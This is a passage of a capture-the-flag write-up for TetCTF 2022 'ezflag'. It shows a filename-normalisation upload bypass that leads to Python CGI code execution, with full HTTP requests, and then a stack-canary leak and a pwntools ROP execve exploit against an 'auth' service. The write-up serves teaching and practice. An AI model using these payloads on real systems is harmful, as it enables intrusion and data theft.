class="p">):</span> <span class="n">write_status</span><span class="p">(</span><span class="mi">400</span><span class="p">,</span> <span class="s">'Bad Request'</span><span class="p">)</span> <span class="k">return</span> <span class="n">normalized_name</span> <span class="o">=</span> <span class="n">item</span><span class="p">.</span><span class="n">filename</span><span class="p">.</span><span class="n">strip</span><span class="p">().</span><span class="n">replace</span><span class="p">(</span><span class="s">'./'</span><span class="p">,</span> <span class="s">''</span><span class="p">)</span> <span class="n">path</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">normalized_name</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'/'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="n">os</span><span class="p">.</span><span class="n">makedirs</span><span class="p">(</span><span class="s">'../upload/'</span> <span class="o">+</span> <span class="n">path</span><span class="p">,</span> <span class="n">exist_ok</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'../upload/'</span> <span class="o">+</span> <span class="n">normalized_name</span><span class="p">,</span> <span class="s">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">item</span><span class="p">.</span><span class="nb">file</span><span class="p">.</span><span class="n">read</span><span class="p">())</span> <span class="n">write_location</span><span class="p">(</span><span class="s">'/uploads/'</span> <span class="o">+</span> <span class="n">normalized_name</span><span class="p">)</span> </code></pre></div></div> <p>Assuming we want to be able to write <code class="language-plaintext highlighter-rouge">.py</code> files, we can abuse the normalisation process to transform the filename to one that ends with <code class="language-plaintext highlighter-rouge">.py</code> after the check occurs. For example:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">486</span><span class="p">]:</span> <span class="n">name</span> <span class="o">=</span> <span class="s">"attack.p./y"</span> <span class="p">...:</span> <span class="k">assert</span> <span class="s">".py"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">name</span> <span class="p">...:</span> <span class="n">normalized_name</span> <span class="o">=</span> <span class="n">name</span><span class="p">.</span><span class="n">strip</span><span class="p">().</span><span class="n">replace</span><span class="p">(</span><span class="s">'./'</span><span class="p">,</span> <span class="s">''</span><span class="p">)</span> <span class="p">...:</span> <span class="k">assert</span> <span class="s">".py"</span> <span class="ow">in</span> <span class="n">normalized_name</span> <span class="p">...:</span> <span class="k">print</span><span class="p">(</span><span class="n">normalized_name</span><span class="p">)</span> <span class="n">attack</span><span class="p">.</span><span class="n">py</span> </code></pre></div></div> <p>If we look in <code class="language-plaintext highlighter-rouge">nginx-site.conf</code>, we can see that the <code class="language-plaintext highlighter-rouge">/upload/</code> directory that we can upload files to is mapped to the <code class="language-plaintext highlighter-rouge">/uploads/</code> path on the web server.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>server { listen 80; listen [::]:80; location / { proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $remote_addr; proxy_pass http://127.0.0.1:8080/cgi-bin/upload.py; } location /uploads/ { proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $remote_addr; proxy_pass http://127.0.0.1:8080/uploads/; } } </code></pre></div></div> <p>Within the <code class="language-plaintext highlighter-rouge">lighttpd.conf</code> configuration file, we can see that <code class="language-plaintext highlighter-rouge">.py</code> files are executed with the <code class="language-plaintext highlighter-rouge">/usr/bin/python3</code> interpreter with CGI. Thus, if we write a <code class="language-plaintext highlighter-rouge">.py</code> file, we can simply visit the path and it should execute our arbitrary code.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>... alias.url += ( "/cgi-bin" =&gt; "/var/www/cgi-bin" ) alias.url += ( "/uploads" =&gt; "/var/www/upload" ) cgi.assign = ( ".py" =&gt; "/usr/bin/python3" ) </code></pre></div></div> <p>Putting this together, we can create our exploit python script on the server with the following <code class="language-plaintext highlighter-rouge">POST</code> request, including the <code class="language-plaintext highlighter-rouge">admin:admin</code> basic authentication header.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST / HTTP/1.1 Host: 18.191.117.63:9090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------27015668151794350363716216349 Content-Length: 315 Origin: http://18.191.117.63:9090 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://18.191.117.63:9090/ Upgrade-Insecure-Requests: 1 -----------------------------27015668151794350363716216349 Content-Disposition: form-data; name="file"; filename="amon_34123.p./y" Content-Type: application/octet-stream #!/usr/bin/env python3 import os print(os.system("ls -la /;cat /flag")) -----------------------------27015668151794350363716216349-- </code></pre></div></div> <p>Next, to trigger the script, we just simply visit the <code class="language-plaintext highlighter-rouge">/uploads/amon_34123.py</code> script path.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /uploads/amon_34123.py HTTP/1.1 Host: 18.191.117.63:9090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Upgrade-Insecure-Requests: 1 </code></pre></div></div> <p>In the response, we can see that the <code class="language-plaintext highlighter-rouge">flag</code> as well as some other interesting file such as <code class="language-plaintext highlighter-rouge">flag2</code> and <code class="language-plaintext highlighter-rouge">auth</code> are located at the <code class="language-plaintext highlighter-rouge">/</code> path. We also obtain our first flag.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 01 Jan 2022 06:58:00 GMT Content-Length: 1636 Connection: close total 864 drwxr-xr-x 1 root root 4096 Jan 1 00:06 . drwxr-xr-x 1 root root 4096 Jan 1 00:06 .. -rwxr-xr-x 1 root root 0 Jan 1 00:06 .dockerenv -r-xr--r-- 1 daemon daemon 802768 Dec 31 22:39 auth lrwxrwxrwx 1 root root 7 Oct 6 16:47 bin -&gt; usr/bin drwxr-xr-x 2 root root 4096 Apr 15 2020 boot drwxr-xr-x 5 root root 340 Jan 1 03:44 dev drwxr-xr-x 1 root root 4096 Jan 1 00:06 etc -r--r--r-- 1 root root 41 Jan 1 00:03 flag -r-------- 1 daemon daemon 41 Jan 1 00:03 flag2 drwxr-xr-x 2 root root 4096 Apr 15 2020 home lrwxrwxrwx 1 root root 7 Oct 6 16:47 lib -&gt; usr/lib lrwxrwxrwx 1 root root 9 Oct 6 16:47 lib32 -&gt; usr/lib32 lrwxrwxrwx 1 root root 9 Oct 6 16:47 lib64 -&gt; usr/lib64 lrwxrwxrwx 1 root root 10 Oct 6 16:47 libx32 -&gt; usr/libx32 drwxr-xr-x 2 root root 4096 Oct 6 16:47 media drwxr-xr-x 2 root root 4096 Oct 6 16:47 mnt drwxr-xr-x 2 root root 4096 Oct 6 16:47 opt dr-xr-xr-x 995 root root 0 Jan 1 03:44 proc drwx------ 1 root root 4096 Jan 1 03:40 root drwxr-xr-x 1 root root 4096 Jan 1 00:06 run -rwxr-xr-x 1 1000 1000 189 Dec 31 15:29 run.sh lrwxrwxrwx 1 root root 8 Oct 6 16:47 sbin -&gt; usr/sbin drwxr-xr-x 2 root root 4096 Oct 6 16:47 srv dr-xr-xr-x 13 root root 0 Jan 1 03:44 sys drwxrwxrwt 1 root root 4096 Jan 1 06:57 tmp drwxr-xr-x 1 root root 4096 Jan 1 00:05 usr drwxr-xr-x 1 root root 4096 Jan 1 00:05 var TetCTF{65e95f4eacc1fe7010616e051f1c610a} 0 </code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TetCTF{65e95f4eacc1fe7010616e051f1c610a}</code></p> <h3 id="part-2">Part 2</h3> <p>Note: Unfortunately, I didn’t solve this during the few hours I played during the competition since the <code class="language-plaintext highlighter-rouge">auth</code> server was crashed by some other players early during the CTF. However, I think the exploit should work remotely barring the pwntools dependency.</p> <p>Once on the server, we can exfiltrate the <code class="language-plaintext highlighter-rouge">auth</code> binary that’s listening on port 4444 of the remote server.</p> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/tetctf2022/auth">auth</a></p> <p>To simulate the remote service, we can create a flag at <code class="language-plaintext highlighter-rouge">/flag2</code>.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span><span class="nb">echo</span> <span class="s1">'TetCTF{Fake_Flag_Because_Service_Is_Down}'</span> <span class="o">&gt;</span> /flag2 </code></pre></div></div> <p>When running and interacting with the service, we notice that something odd is going on with the output. It looks like it’s leaking <code class="language-plaintext highlighter-rouge">0x100</code> bytes of memory along with the <code class="language-plaintext highlighter-rouge">'Y</code> or <code class="language-plaintext highlighter-rouge">'N'</code> return code.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">printf</span> <span class="s1">'admin\nadmin\n'</span> | nc localhost 4444 | xxd <span class="go">00000000: 5964 6d69 6e0a 6164 6d69 6e0a ff80 5b9a Ydmin.admin...[. </span><span class="gp">00000010: a011 b945 fc7f 0000 2497 0000 0000 0000 ...E....$</span>....... <span class="go">00000020: 0300 0000 0000 0000 a011 b945 fc7f 0000 ...........E.... 00000030: 8c11 b945 fc7f 0000 8860 4900 0000 0000 ...E.....`I..... 00000040: b400 0000 0000 0000 88c6 4400 0000 0000 ..........D..... 00000050: 2000 0000 3000 0000 8011 b945 fc7f 0000 ...0......E.... 00000060: c010 b945 fc7f 0000 0031 2918 ff80 5b9a ...E.....1)...[. 00000070: 0000 0000 0000 0000 0000 0000 0000 0000 ................ </span><span class="gp">00000080: 4898 3202 0000 0000 2497 0000 0000 0000 H.2.....$</span>....... <span class="gp">00000090: 249c 4900 0000 0000 f00f b945 fc7f 0000 $</span>.I........E.... <span class="go">000000a0: 802b 4c00 0000 0000 0a00 0000 0000 0000 .+L............. 000000b0: 2013 4c00 0000 0000 7260 4900 0000 0000 .L.....r`I..... 000000c0: 402f 4c00 0000 0000 1810 4c00 0000 0000 @/L.......L..... 000000d0: 0000 0000 0000 0000 036d 4100 0000 0000 .........mA..... 000000e0: 1000 0000 0000 0000 2013 4c00 0000 0000 ........ .L..... </span><span class="gp">000000f0: 2497 0000 0000 0000 0000 0000 0000 0000 $</span>............... </code></pre></div></div> <p>If we send a large amount of data, we get a stack smashing detected message so it appears that we can trigger a buffer overflow. Next, we need to determine if we can use the info leak to leak the stack canary.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">printf</span> <span class="s1">'admin\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'</span> | nc localhost 4444 | xxd <span class="c">... </span><span class="go">Connection accepted from 127.0.0.1:38694 *** stack smashing detected ***: terminated </span></code></pre></div></div> <p>If we try to send the smallest input possible that triggers the memory leak, we can see that there is a canary-looking value at offset <code class="language-plaintext highlighter-rouge">0x8</code> and <code class="language-plaintext highlighter-rouge">0x68</code> (<code class="language-plaintext highlighter-rouge">0x9a5b80ff18293100</code>). This value should not change between requests since the server forks and retains the parent’s memory layout and contents.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">printf</span> <span class="s1">'\n\n'</span> | nc localhost 4444 | xxd <span class="nt">-g</span> 8 <span class="nt">-e</span> <span class="go">00000000: 3630373833000a4e 9a5b80ff18293100 N..38706.1)...[. 00000010: 00007ffc45b911a0 0000000000009732 ...E....2....... 00000020: 0000000000000003 00007ffc45b911a0 ...........E.... 00000030: 00007ffc45b9118c 0000000000496088 ...E.....`I..... 00000040: 00000000000000bb 000000000044c688 ..........D..... 00000050: 0000003000000020 00007ffc45b91180 ...0......E.... 00000060: 00007ffc45b910c0 9a5b80ff18293100 ...E.....1)...[. 00000070: 0000000000000000 0000000000000000 ................ 00000080: 0000000002329848 0000000000009732 H.2.....2....... </span><span class="gp">00000090: 0000000000499c24 00007ffc45b90ff0 $</span>.I........E.... <span class="go">000000a0: 00000000004c2b80 000000000000000a .+L............. 000000b0: 00000000004c1320 0000000000496072 .L.....r`I..... 000000c0: 00000000004c2f40 00000000004c1018 @/L.......L..... 000000d0: 0000000000000000 0000000000416d03 .........mA..... 000000e0: 0000000000000010 00000000004c1320 ........ .L..... 000000f0: 0000000000009732 0000000000000000 2............... </span></code></pre></div></div> <p>The vulnerable code and stack smashing check appears in this function:</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/ezflag-1.png" alt="Vulnerable function" class="align-center" /></p> <p>If we do a quick check in the debugger, we can confirm that the value is indeed the stack canary.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Thread 2.1 "auth" hit Breakpoint 1, 0x0000000000401f85 in ?? () [ Legend: Modified register | Code | Heap | Stack | String ] ─────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── </span><span class="c">... </span><span class="gp">$</span>rsi : 0x9a5b80ff18293100 <span class="c">... </span><span class="gp">$</span>eflags: <span class="o">[</span>carry PARITY adjust ZERO sign <span class="nb">trap </span>INTERRUPT direction overflow resume virtualx86 identification] <span class="gp">$</span>cs: 0x0033 <span class="nv">$ss</span>: 0x002b <span class="nv">$ds</span>: 0x0000 <span class="nv">$es</span>: 0x0000 <span class="nv">$fs</span>: 0x0063 <span class="nv">$gs</span>: 0x0000 <span class="go">─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── </span><span class="gp">0x00007ffc45b91010│+0x0000: 0x0000000000000001 ← $</span>rsp <span class="go">0x00007ffc45b91018│+0x0008: 0x000003e800002190 </span><span class="gp">0x00007ffc45b91020│+0x0010: 0x0000000000000000 ← $</span>rdx <span class="go">0x00007ffc45b91028│+0x0018: 0x0000000000008801 0x00007ffc45b91030│+0x0020: 0x0000000000000000 0x00007ffc45b91038│+0x0028: 0x9a5b80ff18293100 0x00007ffc45b91040│+0x0030: 0x0000000000000000 0x00007ffc45b91048│+0x0038: 0x000000000040200d → mov edx, 0x100 ───────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x401f7c je 0x401f98 0x401f7e xor eax, eax 0x401f80 mov rsi, QWORD PTR [rsp+0x28] ●→ 0x401f85 xor rsi, QWORD PTR fs:0x28 0x401f8e jne 0x401fc0 0x401f90 add rsp, 0x38 0x401f94 ret 0x401f95 nop DWORD PTR [rax] 0x401f98 cmp WORD PTR [rsp+0xb], 0x6e ───────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── </span><span class="gp">[#</span>0] Id 1, Name: <span class="s2">"auth"</span>, stopped 0x401f85 <span class="k">in</span> ?? <span class="o">()</span>, reason: BREAKPOINT <span class="go">─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── </span><span class="gp">[#</span>0] 0x401f85 → xor rsi, QWORD PTR fs:0x28 <span class="gp">[#</span>1] 0x40200d → mov edx, 0x100 <span class="gp">[#</span>2] 0x4018ab → mov edi, ebp <span class="gp">[#</span>3] 0x402860 → mov edi, eax <span class="gp">[#</span>4] 0x401dde → hlt <span class="go">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef➤ </span></code></pre></div></div> <p>Next, we need to find the offset of the canary. First, we send a de Brujin sequence and wait for the same breakpoint as before to trigger.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">printf</span> <span class="s1">'\naaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa\n'</span> | nc localhost 4444 </code></pre></div></div> <p>In the debugger, we can see that the stack canary is at offset 24.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">gef➤ info reg $</span>rsi <span class="go">rsi 0x6161616161616164 0x6161616161616164 gef➤ pattern offset 0x6161616161616164 [+] Searching for '0x6161616161616164' [+] Found at offset 24 (little-endian search) likely [+] Found at offset 17 (big-endian search) gef➤ </span></code></pre></div></div> <p>Repeating this step and fixing the canary also yields the saved return pointer at offset 40. Now, we can craft the ROP payload. A useful configuration of the registers at the point of the controlled return is the contents of the <code class="language-plaintext highlighter-rouge">rdi</code> register. It appears to be pointing into the buffer of our user controlled data. We can abuse this in crafting a shorter ROP chain.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ 0x0000000000401f94 in ?? () [ Legend: Modified register | Code | Heap | Stack | String ] ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── </span><span class="gp">$</span>rax : 0x0 <span class="gp">$</span>rbx : 0x9606 <span class="gp">$</span>rcx : 0x00007ffc45b9107e → 0x7ffc45b9118c0a0a <span class="gp">$</span>rdx : 0x00007ffc45b91048 → 0x0000000000402000 → call 0x44c430 <span class="gp">$</span>rsp : 0x00007ffc45b91048 → 0x0000000000402000 → call 0x44c430 <span class="gp">$</span>rbp : 0x29 <span class="gp">$</span>rsi : 0x0 <span class="gp">$</span>rdi : 0x00007ffc45b91055 → <span class="s2">"</span><span class="se">\n</span><span class="s2">adminAAAAAAAAAAAAAAAAAAA"</span> <span class="gp">$</span>rip : 0x0000000000401f94 → ret <span class="gp">$</span>r8 : 0x0 <span class="gp">$</span>r9 : 0x0 <span class="gp">$</span>r10 : 0x0 <span class="gp">$</span>r11 : 0x246 <span class="gp">$</span>r12 : 0x00007ffc45b91050 → <span class="s2">"admin</span><span class="se">\n</span><span class="s2">adminAAAAAAAAAAAAAAAAAAA"</span> <span class="gp">$</span>r13 : 0x00007ffc45b911a0 → 0x0100007f06960002 <span class="gp">$</span>r14 : 0x00007ffc45b9118c → 0x5c11000200000010 <span class="gp">$</span>r15 : 0x0000000000496088 → <span class="s2">"Connection accepted from %s:%d</span><span class="se">\n</span><span class="s2">"</span> <span class="gp">$</span>eflags: <span class="o">[</span>carry PARITY adjust zero sign <span class="nb">trap </span>INTERRUPT direction overflow resume virtualx86 identification] <span class="gp">$</span>cs: 0x0033 <span class="nv">$ss</span>: 0x002b <span class="nv">$ds</span>: 0x0000 <span class="nv">$es</span>: 0x0000 <span class="nv">$fs</span>: 0x0063 <span class="nv">$gs</span>: 0x0000 <span class="go">─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── </span><span class="gp">0x00007ffc45b91048│+0x0000: 0x0000000000402000 → call 0x44c430 ← $</span>rdx, <span class="nv">$rsp</span> <span class="gp">0x00007ffc45b91050│+0x0008: "admin\nadminAAAAAAAAAAAAAAAAAAA" ← $</span>r12 <span class="go">0x00007ffc45b91058│+0x0010: "minAAAAAAAAAAAAAAAAAAA" 0x00007ffc45b91060│+0x0018: "AAAAAAAAAAAAAA" 0x00007ffc45b91068│+0x0020: 0x3100414141414141 ("AAAAAA"?) 0x00007ffc45b91070│+0x0028: 0x42429a5b80ff1829 0x00007ffc45b91078│+0x0030: 0x0a0a424242424242 0x00007ffc45b91080│+0x0038: 0x00007ffc45b9118c → 0x5c11000200000010 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── ● 0x401f85 xor rsi, QWORD PTR fs:0x28 0x401f8e jne 0x401fc0 0x401f90 add rsp, 0x38 → 0x401f94 ret ↳ 0x402000 call 0x44c430 0x402005 mov rdi, r12 0x402008 call 0x401f10 0x40200d mov edx, 0x100 0x402012 mov rsi, r12 0x402015 mov edi, ebp ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── </span><span class="gp">[#</span>0] Id 1, Name: <span class="s2">"auth"</span>, stopped 0x401f94 <span class="k">in</span> ?? <span class="o">()</span>, reason: SINGLE STEP <span class="go">─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── </span><span class="gp">[#</span>0] 0x401f94 → ret <span class="gp">[#</span>1] 0x402000 → call 0x44c430 <span class="gp">[#</span>2] 0x4018ab → mov edi, ebp <span class="gp">[#</span>3] 0x402860 → mov edi, eax <span class="gp">[#</span>4] 0x401dde → hlt <span class="go">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef➤ </span></code></pre></div></div> <p>When crafting the exploit, we also have to fix up the stack a bit as it is slightly off alignment, hence we have to look for a stack move gadget. Once the stack is fixed up, we can craft an <code class="language-plaintext highlighter-rouge">syscall(execve, "our controlled buffer in rdi", 0, 0)</code> ROP chain to run a program. The obvious data to place in the controlled buffer is <code class="language-plaintext highlighter-rouge">/bin/sh</code> but an interactive shell is a little annoying to deal with since we don’t have control over <code class="language-plaintext highlighter-rouge">stdin</code> and <code class="language-plaintext highlighter-rouge">stdout</code> yet over the network connection. Since we have shell access already on the remote system, we can just create a helper shell script to execute instead that copies <code class="language-plaintext highlighter-rouge">/flag2</code> to a temporary location and changes it to be world-readable. We’ll name this file <code class="language-plaintext highlighter-rouge">/tmp/give</code>.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">printf</span> <span class="s1">'#!/bin/bash\ncp /flag2 /tmp/flag2;chmod 777 /tmp/flag2'</span> <span class="o">&gt;</span> /tmp/give<span class="p">;</span> <span class="nb">chmod</span> +x /tmp/give </code></pre></div></div> <p>Now, we can write the full exploit to trigger the <code class="language-plaintext highlighter-rouge">execve</code> of this shell script:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="p">.</span><span class="n">clear</span><span class="p">()</span> <span class="n">context</span><span class="p">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s">'amd64'</span> <span class="c1"># context.log_level = 'debug' </span> <span class="c1"># Make a shell script executable. # printf '#!/bin/bash\ncp /flag2 /tmp/flag2;chmod 777 /tmp/flag2' &gt; /tmp/give; chmod +x /tmp/give </span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="c1"># Generate the ROP chains. </span> <span class="c1"># First, generate the chain to fix up the stack. </span> <span class="n">rop</span> <span class="o">=</span> <span class="n">ROP</span><span class="p">(</span><span class="s">'./auth'</span><span class="p">,</span> <span class="n">badchars</span><span class="o">=</span><span class="sa">b</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">rop</span><span class="p">.</span><span class="n">raw</span><span class="p">(</span><span class="n">rop</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="n">move</span><span class="o">=</span><span class="mi">68</span><span class="p">).</span><span class="n">address</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Constructed ROP payload to fix stack: </span><span class="se">\n</span><span class="s">{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rop</span><span class="p">.</span><span class="n">dump</span><span class="p">()))</span> <span class="n">stack_rop_payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">rop</span><span class="p">.</span><span class="n">build</span><span class="p">())</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Length of ROP fix stack payload: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">stack_rop_payload</span><span class="p">))))</span> <span class="c1"># Next, generate the ROP chain to call execve. </span> <span class="c1"># RDI contains the address of a couple bytes into the buffer, which is perfect. </span> <span class="c1"># We want to execute syscall(execve, n_bytes_into_buffer, 0, 0) </span> <span class="n">rop</span> <span class="o">=</span> <span class="n">ROP</span><span class="p">(</span><span class="s">'./auth'</span><span class="p">,</span> <span class="n">badchars</span><span class="o">=</span><span class="sa">b</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">rop</span><span class="p">(</span><span class="n">rax</span><span class="o">=</span><span class="n">constants</span><span class="p">.</span><span class="n">SYS_execve</span><span class="p">,</span> <span class="n">rsi</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">rdx</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="n">rop</span><span class="p">.</span><span class="n">raw</span><span class="p">(</span><span class="n">rop</span><span class="p">.</span><span class="n">syscall</span><span class="p">.</span><span class="n">address</span><span class="p">)</span> <span class="c1"># Finally, we can JMP RSP to our shellcode. </span> <span class="c1">#rop.raw(rop.jmp_rsp.address) </span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Constructed ROP payload: </span><span class="se">\n</span><span class="s">{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rop</span><span class="p">.</span><span class="n">dump</span><span class="p">()))</span> <span class="n">rop_payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">rop</span><span class="p">.</span><span class="n">build</span><span class="p">())</span> <span class="c1"># from IPython import embed; embed() </span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Length of ROP payload: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">rop_payload</span><span class="p">))))</span> <span class="c1"># Leak the canary with a short write to expose the canary at buffer + 8. </span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'localhost'</span><span class="p">,</span> <span class="mi">4444</span><span class="p">)</span> <span class="n">canary_payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\n\n</span><span class="s">'</span> <span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">canary_payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Canary: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">canary</span><span class="p">)))</span> <span class="n">p</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="c1"># Trigger the overflow. </span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'localhost'</span><span class="p">,</span> <span class="mi">4444</span><span class="p">)</span> <span class="c1"># Fix the canary. </span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span> <span class="o">+</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span> <span class="mi">24</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="s">'B'</span><span class="o">*</span><span class="mi">8</span> <span class="c1"># ROP Chain. </span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">stack_rop_payload</span> <span class="c1"># This is the start of the n bytes into the buffer we referenced above. </span> <span class="c1"># We specify /tmp/give as the program to execute since it's simpler than attempting to mess with </span> <span class="c1"># the fd to get an interactive shell. We already have a reverse shell through ezflag1. </span> <span class="c1"># Also, small padding to account for the non-aligned stack we are working with. </span> <span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'/tmp/give</span><span class="se">\x00</span><span class="s">'</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x48</span><span class="p">,</span> <span class="sa">b</span><span class="s">'C'</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">rop_payload</span> <span class="c1"># Add the shellcode </span> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x100</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x90</span><span class="s">'</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Length of payload: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))))</span> <span 